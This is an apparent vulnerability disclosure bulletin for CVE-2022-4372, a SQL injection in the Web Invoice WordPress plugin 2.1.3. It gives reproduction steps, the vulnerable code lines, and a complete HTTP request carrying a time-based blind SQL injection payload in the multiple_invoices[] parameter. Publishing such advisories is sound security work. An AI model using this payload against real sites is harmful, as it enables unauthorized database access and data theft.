Headline
CVE-2022-4372: Security Bulletin
The Web Invoice WordPress plugin through 2.1.3 does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL Injection exploitable by high privilege users such as admin by default. However, depending on the plugin configuration, other users, such as subscriber could exploit this as well
web-invoice 2.1.3 (2/2) WordPress plugin SQL injection****Vulnerability Metadata
Key
Value
Date of Disclosure
December 12 2022
Affected Software
web-invoice
Affected Software Type
WordPress plugin
Version
2.1.3
Weakness
SQL Injection
CWE ID
CWE-89
CVE ID
CVE-2022-4372
CVSS 3.x Base Score
n/a
CVSS 2.0 Base Score
n/a
Reporter
Daniel Krohmer, Kunal Sharma
Reporter Contact
Link to Affected Software
https://wordpress.org/plugins/web-invoice
Link to Vulnerability DB
https://nvd.nist.gov/vuln/detail/CVE-2022-4372
Vulnerability Description
The multiple_invoices[] query array parameter in web-invoice 2.1.3 is vulnerable to to SQL injection. An authenticated attacker may abuse the new_web_invoice page of the plugin to craft a malicious GET request. Depending on the plugin settings, this attack may impact any user role (subscriber or higher).
Exploitation Guide
This exploit was tested with WordPress 4.2, since the plugin is not working on recent WordPress versions anymore.
In the plugin settings, any user role can be assigned to invoice management. In this example, we use a low-privilege Subscriber role.
Create a new invoice for an arbitrary user:
Fill out the form and submit the invoice by clicking on Save and Preview:
Go to the invoice overview by clicking on Web Invoice, then click on the subject that has just been created.
Scroll down and hit Clear Log:
Clicking the previous button triggers the vulnerable request. multiple_invoices[] is the vulnerable query parameter
A POC may look like the following request:
In the code, the vulnerability is triggered by unsanitized user input of multiple_invoices[] at line 42 in ./Flow.php.
In ./Functions.php at line 75, the parameter is passed to the function web_invoice_show_message.
In this function, the malicious database is crafted at line 503 of ./Functions.php
Exploit Payload
Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.
The SQL injection can be triggered by sending the request below.
GET /wp-admin/admin.php?page=new_web_invoice&multiple_invoices[]=31618572+AND+(SELECT+5926+FROM+(SELECT(SLEEP(5)))erUA)&multiple_invoices[]=31618572+AND+(SELECT+5926+FROM+(SELECT(SLEEP(5)))erUA)&web_invoice_action=clear_log HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost/wp-admin/admin.php?page=new_web_invoice&web_invoice_action=doInvoice&invoice_id=31618572
Cookie: wordpress_86a9106ae65537651a8e456835b316ab=subscriber%7C1669997060%7CQdxLUgq9Wz8z38XxdX2XGFlZGfCPfJ749H8TSkI3bVk%7C4d290f74d0fdee6ed52774b0827884c4a4ac8f0515fbe0c2ccd89c9093b52f90; wplrp_subscriber_id=6; wp_woocommerce_session_86a9106ae65537651a8e456835b316ab=1%7C%7C1669972640%7C%7C1669969040%7C%7C4e12cab99480b80c0ee581a6517239e4; wp-settings-1=libraryContent%3Dbrowse%26mfold%3Do; wp-settings-time-1=1669802217; wp-settings-time-2=1669824525; XDEBUG_SESSION=netbeans-xdebug; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=subscriber%7C1669997060%7CQdxLUgq9Wz8z38XxdX2XGFlZGfCPfJ749H8TSkI3bVk%7C7264237c5bb535f6d1e5efa1bf3cb1db26c41b5a279f134aa8004c585e6e0ee7
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origi
Sec-Fetch-User: ?1